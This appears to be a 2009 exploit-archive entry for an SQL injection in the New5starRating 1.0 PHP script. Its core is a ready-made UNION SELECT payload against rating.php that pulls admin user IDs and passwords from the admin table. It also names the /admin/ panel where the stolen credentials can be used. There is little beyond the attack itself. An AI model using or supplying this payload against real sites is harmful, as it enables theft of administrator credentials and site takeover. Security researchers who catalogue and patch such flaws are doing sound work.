id: 5687
date: 08/23/2009
title: New5starRating 1.0 (rating.php) SQL Injection Vulnerability
author: Bgh7
cves: 

===========================================================
New5starRating 1.0 (rating.php) SQL Injection Vulnerability
===========================================================


New5starRating v1.0 (rating.php) Sql Inj. Vuln.
##################
Yazar: Bgh7
Turk Bilisim Gucleri
##################
Download;
http://www.maniacomputer.com/5star_rating/New_5Star.html
Bug-->Sql Inj.
##################
Exp: rating.php?det=-1 union select userid,0,0,userpass from admin
Panel: /admin/
##################




#  0day.today [2023-03-24]  #